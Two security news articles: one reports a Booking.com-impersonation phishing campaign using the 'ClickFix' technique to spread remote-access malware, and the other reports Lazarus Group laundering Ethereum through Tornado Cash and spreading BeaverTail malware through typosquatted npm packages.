Image by Ivan Radic, from Flickr

Cybercriminals Impersonate Booking.com In New Phishing Attack

• Written by Kiara Fabbri Former Tech News Writer
• Fact-Checked by Sarah Frazier Former Content Manager

Microsoft has identified an ongoing phishing campaign targeting hotel and hostel staff by impersonating the travel agency Booking.com.

In a Rush? Here are the Quick Facts!

• Microsoft warns of a phishing campaign targeting hotel staff via fake Booking.com emails.
• Hackers use a “ClickFix” method to bypass security filters and avoid detection.
• Booking.com confirms no security breach but warns partners about ongoing phishing scams.

Microsoft’s security team identified the campaign in December 2024, just before the busy holiday travel season. The scam is still active as of February 2025, affecting organizations across North America, Europe, Oceania, and parts of Asia.

The attackers send fake emails that appear to be from Booking.com, referencing negative guest reviews, urgent booking requests, or account verification needs. These emails contain links leading to a deceptive webpage designed to resemble Booking.com.

On this fake website, victims are prompted to complete a CAPTCHA verification, but instead of a real security check, they are instructed to open a special command window on their computer and paste in a provided code. This action downloads and executes malware that can steal sensitive information.

The malware delivered in this attack includes several well-known hacking tools, such as XWorm, VenomRAT, and AsyncRAT.

These programs allow cybercriminals to take control of infected devices, capture passwords, and commit financial fraud. Microsoft has linked this activity to a hacker group it calls Storm-1865, which has previously targeted e-commerce platforms and hotel guests using similar tactics.

The addition of this new method, known as ” ClickFix ,” shows how attackers are evolving to bypass security defenses. By making the victim take specific actions, such as copying and pasting code, they can avoid automatic detection by email filters and antivirus software.

A Booking.com spokesperson clarified that the attack does not involve a security breach on their platform.

“While we can confirm that Booking.com’s systems have not been breached, we are aware that unfortunately some of our accommodation partners and customers have been impacted by phishing attacks sent by professional criminals, with the criminal intent of taking over their local computer systems with malware,” they said, reported The Record .

Microsoft advises businesses to enforce multi-factor authentication, use email filtering tools to scan for phishing attempts, and ensure staff are trained to recognize suspicious emails. With cybercriminals constantly refining their tactics, staying vigilant against phishing attacks is crucial, especially in industries that handle sensitive customer data.

Image by Kanchanara, from Unsplash

Lazarus Group Linked To $750,000 Ethereum Laundering

• Written by Kiara Fabbri Former Tech News Writer
• Fact-Checked by Sarah Frazier Former Content Manager

In a Rush? Here are the Quick Facts!

• Lazarus Group deposited 400 ETH ($750,000) into Tornado Cash on March 13.
• The deposit connects to their previous Bitcoin network activities, indicating ongoing fund laundering.
• Lazarus has stolen over $1.3 billion in crypto assets in 2024, double 2023’s total.

On March 13, blockchain security firm CertiK reported that the group deposited 400 Ethereum (ETH), worth around $750,000, into the Tornado Cash mixing service, a tool used to obscure the origin of crypto assets.

#CertiKInsight 🚨 We have detected deposit of 400 ETH in https://t.co/0lwPdz0OWi on Ethereum from: 0xdB31a812261d599A3fAe74Ac44b1A2d4e5d00901 0xB23D61CeE73b455536EF8F8f8A5BadDf8D5af848. The fund traces to the Lazarus group’s activity on the Bitcoin network. Stay Vigilant! pic.twitter.com/IHwFwt5uQs — CertiK Alert (@CertiKAlert) March 13, 2025

This move was linked to their previous activity on the Bitcoin network, underscoring the group’s ongoing efforts to launder funds following high-profile hacks.

The Lazarus Group is notorious for its involvement in major cryptocurrency thefts, including the $1.4 billion hack of Bybit in February 2025 and the $29 million Phemex hack in January, as noted by CoinTelegraph .

According to blockchain analytics firm Chainalysis , Lazarus has stolen over $1.3 billion in crypto assets in 2024 alone, more than doubling their 2023 thefts.

Meanwhile, cybersecurity researchers at Socket have uncovered a new wave of malicious packages targeting the npm ecosystem, used by developers to manage JavaScript libraries.

The six malicious packages, downloaded over 330 times, were found to be embedded with a form of malware known as BeaverTail. These packages mimic legitimate libraries in a deceptive tactic called typosquatting, where slight variations in names are used to trick developers into installing harmful code.

Socket’s researchers observed that the tactics, techniques, and procedures in this npm attack closely align with Lazarus’s known operations. The packages were designed to steal sensitive information, including credentials and cryptocurrency data, while also deploying backdoors into affected systems.

Specifically, they targeted files in browsers like Chrome, Brave, and Firefox, and keychain data on macOS, focusing on developers who may not notice the malware during installation.

This attack highlights Lazarus’s continued use of sophisticated infiltration methods, leveraging trusted names in the npm registry to exploit the open-source community. Despite the obfuscation techniques used, researchers were able to detect the malicious intent and flagged the packages for removal.

As Lazarus continues its cybercriminal activities, experts warn that organizations must adopt stricter security measures, such as automated auditing of code and dependency scans, to prevent similar attacks.